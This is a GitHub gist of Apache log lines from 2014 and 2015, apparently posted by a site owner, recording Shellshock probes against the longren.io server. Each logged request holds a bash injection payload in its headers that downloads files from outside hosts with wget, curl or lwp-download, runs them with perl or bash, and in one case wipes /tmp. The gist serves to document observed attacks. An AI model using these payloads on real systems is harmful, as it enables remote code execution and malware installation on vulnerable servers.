Instantly share code, notes, and snippets.

@tlongren /probes.txt
Last active Aug 29, 2015

Embed
What would you like to do?
Shellshock Attempts
Oct 20 05:22:59 longren httpd: Oct 20 06:22:59 longren.io apache 80.241.209.165 - - [20/Oct/2014:06:22:59 -0400] "GET /cgi-bin/bit.cgi HTTP/1.0"301 - "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://184.171.247.165/ji ; lwp-download http://184.171.247.165/ji ; curl -O /var/tmp/jiw http://184.171.247.165/ji ; perl /var/tmp/ji ; rm -rf *ji\""
Oct 20 05:23:00 longren httpd: Oct 20 06:22:59 longren.io apache 80.241.209.165 - - [20/Oct/2014:06:22:59 -0400] "GET /cgi-bin/bit.cgi HTTP/1.0"404 55163 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://184.171.247.165/ji ; lwp-download http://184.171.247.165/ji ; curl -O /var/tmp/jiw http://184.171.247.165/ji ; perl /var/tmp/ji ; rm -rf *ji\""
Oct 20 08:16:34 longren httpd: Oct 20 09:16:34 longren.io apache 65.254.63.146 - - [20/Oct/2014:09:16:34 -0400] "GET / HTTP/1.0"301 292 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"
Oct 20 17:49:58 longren httpd: Oct 20 18:49:58 longren.io apache 88.149.202.139 - - [20/Oct/2014:18:49:58 -0400] "GET / HTTP/1.0"301 292 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"
Oct 21 04:47:31 longren httpd: Oct 21 05:47:31 longren.io apache 108.161.131.224 - - [21/Oct/2014:05:47:31 -0400] "GET / HTTP/1.0"301 292 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"
Nov 03 02:14:05 piper httpd: Nov 03 03:14:05 longren.io apache 173.245.50.216 - - [03/Nov/2014:03:14:05 -0500] "GET /introducing-passwds-io/ HTTP/1.1"301 - "bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo \"wget http://yourschool.net/.tmp/frogclog.php?https://longren.io/introducing-passwds-io/ & Chr(34)User-Agent: () { }; echo copal bash -c 'wget http://yourschool.net/.tmp/frogclog.php?https://longren.io/introducing-passwds-io/'" "-"
Nov 03 16:20:14 piper httpd: Nov 03 17:20:13 longren.io apache 80.241.209.165 - - [03/Nov/2014:17:20:13 -0500] "GET /cgi-bin/bit.cgi HTTP/1.0"301 - "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://184.171.247.165/ji ; lwp-download http://184.171.247.165/ji ; curl -O /var/tmp/jiw http://184.171.247.165/ji ; perl /var/tmp/ji ; rm -rf *ji\""
Nov 03 16:20:14 piper httpd: Nov 03 17:20:14 longren.io apache 80.241.209.165 - - [03/Nov/2014:17:20:14 -0500] "GET /cgi-bin/bit.cgi HTTP/1.0"404 52190 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://184.171.247.165/ji ; lwp-download http://184.171.247.165/ji ; curl -O /var/tmp/jiw http://184.171.247.165/ji ; perl /var/tmp/ji ; rm -rf *ji\""
Nov 03 18:54:00 piper httpd: Nov 03 19:54:00 longren.io apache 173.245.50.216 - - [03/Nov/2014:19:54:00 -0500] "GET /introducing-passwds-io/ HTTP/1.1"301 - "bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo \"wget http://yourschool.net/.tmp/frogclog.php?https://longren.io/introducing-passwds-io/ & Chr(34)User-Agent: () { }; echo copal bash -c 'wget http://yourschool.net/.tmp/frogclog.php?https://longren.io/introducing-passwds-io/'" "-"
Nov 04 16:15:33 piper httpd: Nov 04 17:15:33 longren.io apache 80.241.209.165 - - [04/Nov/2014:17:15:33 -0500] "GET /cgi-bin/test.cgi HTTP/1.0"301 - "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://80.241.209.165/a.exe ; lwp-download http://80.241.209.165/a.exe ; curl -O /var/tmp/jiw http://80.241.209.165/a.exe ; perl /var/tmp/a.exe ; rm -rf a.exe\""
Nov 04 16:15:34 piper httpd: Nov 04 17:15:34 longren.io apache 80.241.209.165 - - [04/Nov/2014:17:15:34 -0500] "GET /cgi-bin/test.cgi HTTP/1.0"404 52190 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://80.241.209.165/a.exe ; lwp-download http://80.241.209.165/a.exe ; curl -O /var/tmp/jiw http://80.241.209.165/a.exe ; perl /var/tmp/a.exe ; rm -rf a.exe\""
May 17 12:49:52 piper httpd: May 17 13:49:52 longren.io apache 207.54.154.6 - - [17/May/2015:13:49:52 -0400] "GET / HTTP/1.0"200 88487 "() { :;}; /bin/bash -c \"wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3130342e3133312e39362e3939\"" "() { :;}; /bin/bash -c \"wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3130342e3133312e39362e3939\""
May 20 17:20:28 piper httpd: May 20 18:20:27 longren.io apache 58.213.123.107 - - [20/May/2015:18:20:27 -0400] "GET / HTTP/1.1"200 88489 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/ssh -O /tmp/China.Z-anui >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-anui >> /tmp/Run.sh;echo /tmp/China.Z-anui >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/ssh -O /tmp/China.Z-anui >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-anui >> /tmp/Run.sh;echo /tmp/China.Z-anui >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Jun 08 00:08:29 piper httpd: Jun 08 01:08:29 longren.io apache 23.25.40.33 - - [08/Jun/2015:01:08:29 -0400] "GET / HTTP/1.0"302 281 "() { :;}; /bin/bash -c \"wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3130342e3133312e39362e3939\"" "() { :;}; /bin/bash -c \"wget -O /tmp/bbb dprftp.asuscomm.com/novo.php?ip=3130342e3133312e39362e3939\""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment